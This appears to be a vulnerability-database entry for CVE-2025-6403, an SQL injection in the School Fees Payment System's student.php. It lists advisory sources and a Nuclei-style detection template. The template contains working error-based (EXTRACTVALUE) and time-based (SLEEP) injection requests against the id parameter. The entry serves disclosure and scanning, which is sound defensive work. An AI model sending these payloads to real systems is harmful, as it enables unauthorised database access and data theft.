| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2025-6403 | 21 Jun 2025 10:43 | - | circl |
| Code-Projects School Fees Payment System injection vulnerability | 21 Jun 2025 00:00 | - | cnnvd |
| School Fees Payment System student.php File SQL Injection Vulnerability | 27 Jun 2025 00:00 | - | cnvd |
| CVE-2025-6403 | 21 Jun 2025 10:00 | - | cve |
| CVE-2025-6403 code-projects School Fees Payment System student.php sql injection | 21 Jun 2025 10:00 | - | cvelist |
| EUVD-2025-18809 | 3 Oct 2025 20:07 | - | euvd |
| CVE-2025-6403 | 21 Jun 2025 10:15 | - | nvd |
| CVE-2025-6403 | 21 Jun 2025 10:15 | - | osv |
| PT-2025-26499 · Code Projects · School Fees Payment System | 21 Jun 2025 00:00 | - | ptsecurity |
| CVE-2025-6403 | 23 Jun 2025 10:41 | - | redhatcve |

| Source | Link |
|---|---|
| cve | www.cve.org/CVERecord |
| avd | www.avd.aquasec.com/nvd/2025/cve-2025-6403/ |
| github | www.github.com/tuooo/CVE/issues/16 |
| vuldb | www.vuldb.com/ |
| code-projects | www.code-projects.org/ |

```yaml
id: CVE-2025-6403

info:
  name: Code-Projects School Fees Payment System 1.0 - SQL Injection
  author: hnd3884
  severity: critical
  description: |
    A vulnerability was found in code-projects School Fees Payment System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /student.php. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
  impact: |
    Remote attackers can execute arbitrary SQL commands, potentially leading to data theft or modification.
  remediation: |
    Update to the latest version.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2025-6403
    - https://avd.aquasec.com/nvd/2025/cve-2025-6403/
    - https://github.com/tuooo/CVE/issues/16
    - https://vuldb.com/?id.313335
    - https://code-projects.org/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-6403
    cwe-id: CWE-74
    epss-score: 0.017
    epss-percentile: 0.74316
    cpe: cpe:2.3:a:code-projects:school_fees_payment_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2025,sqli,code_projects,unauth,school_fees_payment_system,time-based,vkev

flow: http(1) || http(2)

http:
  - raw:
      - |
        GET /student.php?action=delete&id=1'+AND+EXTRACTVALUE(0x0a,CONCAT(0x0a,VERSION()))--+- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "XPATH syntax error")'
        condition: and

  - raw:
      - |
        GET /student.php?action=delete&id=1'+AND+SLEEP(7)--+- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 7'
          - 'status_code == 302'
          - 'contains(body, "login.php")'
        condition: and
# digest: 4a0a00473045022100a5409a667f818bba7e040fbe7b8b7ad825f8e10d54acfae4242cdb40bbe0f11c02207b6b346e52b99a51d73dd368fcdba60b4ba92ca3f47ecc16dc30a3495a879308:922c64590222798bb761d5b6d8e72950
```